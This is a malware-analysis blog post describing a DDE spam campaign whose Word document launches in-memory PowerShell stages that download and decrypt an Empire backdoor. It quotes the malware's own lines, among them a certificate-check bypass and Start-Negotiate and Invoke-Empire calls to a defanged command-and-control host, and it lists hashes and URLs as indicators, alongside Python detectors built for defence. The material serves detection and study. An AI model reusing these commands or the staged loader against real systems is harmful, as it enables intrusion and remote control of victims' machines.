Security Now
paulkimayong, Visitor
Macro-less Document and Fileless Malware: the perfect cloaking mechanism for new threats
01.29.18

Overview

At the onset of the discovery of DDE command execution attacks in October, Juniper Threat Labs discovered a series of spam messages using this technique. Dynamic Data Exchange (DDE) is a protocol, or feature, in MS Word and MS Excel for sharing data between applications. Security researchers discovered that this feature can be abused to gain command execution. Below are some of the spam campaigns that Cyphort has detected that arose from this discovery.

IRS spam campaign. SHA256 of doc: 0cfab9a3365f4aabaabca4f31206d1c2d8cf82608c46af9b39d37a0936923987

Efax spam campaign. Docx SHA256: a1a4dbb3e8edbc1e49f16c9183ba9b70125e671c94edd10b5552b7ba365da541

RBC Secure spam campaign. Docx SHA256: 9de0e9ac4bf682a965f3240a0d3353173086a31cafaf7dad80889e52ef7b21dc


In one example, a malicious document launches several stages of PowerShell scripts in memory. The attack is fileless (aside from the document): nothing needs to be written to disk, and everything after the document is PowerShell running in memory. Communication with the C2 server is over SSL, which makes this threat harder to detect. The final payload is an open-source PowerShell backdoor called “Empire”.

 

Infection chain

Stage 1

During our research, we identified the following malware.

File Name: Pelan Strategik PRU14 - 2.docx

Sha256: befed4808484c9d9143c55e0977779aaae114a47def832a1837f3e78775e90c8

The filename is Malay for “Strategic Plan PRU14 - 2.docx”.

 

Opening this file shows a blank document and a message box asking to enable “DDE”; the user has to click through it for the DDE to trigger. Inside the docx, the field that defines how the DDE behaves lives in “document.xml”. It can usually be spotted by the keywords “DDE” and “DDEAUTO”, although in some cases these are obfuscated by padding XML tags between the letters. In this example the DDEAUTO is plainly visible.

document.xml

The DDEAUTO field invokes cmd.exe, which runs PowerShell to download and execute a PowerShell script (0.ps1) from Dropbox storage.
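To show how an analyst can pick such a field out of a docx, here is an added Python example (not code from the post or from Juniper): it reads word/document.xml from the zip container, reassembles each field's instruction text across split <w:instrText> runs so that the "padding tags between letters" trick described above does not hide the keyword, and reports every DDE/DDEAUTO field. The document it scans is constructed inline, with a placeholder instead of a real command.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Matches DDE or DDEAUTO at the start of a (reassembled) field instruction.
DDE_RE = re.compile(r"^\s*DDE(?:AUTO)?\b", re.IGNORECASE)

def dde_fields(docx_bytes: bytes) -> list:
    """Return every DDE/DDEAUTO field instruction found in word/document.xml."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        root = ET.fromstring(zf.read("word/document.xml"))
    hits, current, in_field = [], [], False
    for el in root.iter():
        tag = el.tag.split("}")[-1]
        if tag == "fldSimple":                      # single-element field form
            instr = el.get(f"{{{W_NS}}}instr", "")
            if DDE_RE.search(instr):
                hits.append(" ".join(instr.split()))
        elif tag == "fldChar":                      # complex field: begin ... end
            kind = el.get(f"{{{W_NS}}}fldCharType")
            if kind == "begin":
                in_field, current = True, []
            elif kind == "end" and in_field:
                # Join all instrText runs first: the keyword may be split as
                # <w:instrText>DDE</w:instrText>...<w:instrText>AUTO ...
                instr = " ".join("".join(current).split())
                if DDE_RE.search(instr):
                    hits.append(instr)
                in_field = False
        elif tag == "instrText" and in_field:
            current.append(el.text or "")
    return hits

def build_sample_docx() -> bytes:
    """Constructed sample docx: a DDEAUTO field split across two runs."""
    body = (
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText>DDE</w:instrText></w:r>'
        '<w:r><w:instrText>AUTO c:\\windows\\system32\\cmd.exe '
        '"/k CONSTRUCTED_PLACEHOLDER"</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>Click to enable DDE</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:  # ZIP_STORED, so the XML stays verbatim
        zf.writestr("word/document.xml", body)
    return buf.getvalue()
```

A plain byte search for "DDEAUTO" over the sample file finds nothing, while the field-aware scan reports the full instruction.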

 

Stage 2: 0.ps1

 

The downloaded PowerShell script is base64 encoded, as shown by the following PowerShell process.

 

Process Snapshot

After decoding, it will resolve as follows:

 

ps_code1.png

 

The script downloads the next stage of the malware over SSL from “https://www(.)thestar(.)live:443/login/process(.)php”. The next stage is encrypted with AES-256. The first four bytes of the downloaded data, together with the constant “505dd62e251005fa796e32e9651b6310”, are used as the key to decrypt the rest of the data, from the 5th byte to the end. The “IEX” at the end indicates that what it downloads is another PowerShell script, which is then executed. IEX is the alias for “Invoke-Expression” in PowerShell.

 

The next stage is also hosted on a site reachable over HTTPS, most likely with an untrusted certificate. The script disables SSL certificate checking with the following command so that no warning popup is displayed:

 

[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
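As an added example (not code from the post), the following Python decodes a base64 -EncodedCommand PowerShell command line like the one in the process snapshot and flags the indicators this stage exhibits: IEX/Invoke-Expression, a web download call, and the certificate-validation callback forced to $true. The command line it analyzes is constructed inline with a placeholder URL.

```python
import base64
import re

# Indicators seen in this post's stage-2 script, keyed by an analyst label.
INDICATORS = {
    "iex": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "cert_check_disabled": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "web_download": re.compile(
        r"\bDownloadString\b|\bDownloadFile\b|\bInvoke-WebRequest\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not base64 / truncated UTF-16
        return None

def scan_powershell(cmdline: str) -> dict:
    """Decode the command line if it is encoded, then match each indicator."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    return {
        "encoded": decoded is not None,
        "indicators": sorted(k for k, rx in INDICATORS.items() if rx.search(script)),
    }

def build_sample_cmdline() -> str:
    """Constructed command line mirroring stage 2 (placeholder URL, not the real C2)."""
    script = (
        "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};"
        "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/0.ps1')"
    )
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "powershell.exe -Enc " + blob
```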

Stage 3: Empire Loader

The downloaded data is another PowerShell script. It downloads yet another script from the same C2 server over SSL, this time from “/news.php”. That download is also encrypted with AES-256.

ps_code2a.png ps_code2b.png

 

The script will execute the Start-Negotiate function with these parameters:

 

Start-Negotiate -s "https://www[.]thestar[.]live:443" -SK '505dd62e251005fa796e32e9651b6310' -UA 'Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko';

It posts data to "https://www[.]thestar[.]live:443/news.php", which returns encrypted raw data.

 

The IEX command at the end of the function executes the output of the “Decrypt-Bytes” function, which decrypts the raw data returned by the network call above. The decrypted data is the final payload, the “Empire Backdoor”.

 

It invokes the “Empire Backdoor” with the following command.

 

[GC]::CollecT();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;

Payload: Empire - PowerShell Backdoor

 

The final payload is a PowerShell backdoor called “Empire”. This backdoor/tool is publicly available on GitHub at “https://github.com/EmpireProject/Empire”, with several modifications taken from https://github.com/Hackplayers/Empire-mod-Hackplayers.


empire_screenshot.png

 

From the project’s description:

“Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. It is the mergence of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptological and secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premiered at HackMiami 2016.”

This does not mean that the creators of the backdoor in GitHub are the same actors behind this attack. It’s almost certain that other malicious actors are using the backdoor and weaponizing it for their own gain.

Looking at the modules, this backdoor is pretty dangerous.



modules_added.png

 

The DDE feature has since been disabled to mitigate malware attacks that abuse it, but it took several weeks before Microsoft finally decided to disable it. During that window we saw several threat actors using this technique for cybercrime. It is always important for people involved in security to stay on top of the current threat landscape.

 

Indicators of Compromise

 

Word Doc

Befed4808484c9d9143c55e0977779aaae114a47def832a1837f3e78775e90c8

Network:

https://dl[.]dropboxusercontent[.]com/s/t505u2gjv9qzn0y/0.ps1

https://www[.]thestar[.]live:443

 

Cyphort detects this threat as TROJAN_DOWNLOADER.DC

 

cyphort_detection.png

 

Sky ATP also detects this as follows:

 

sky_atp_detections.png
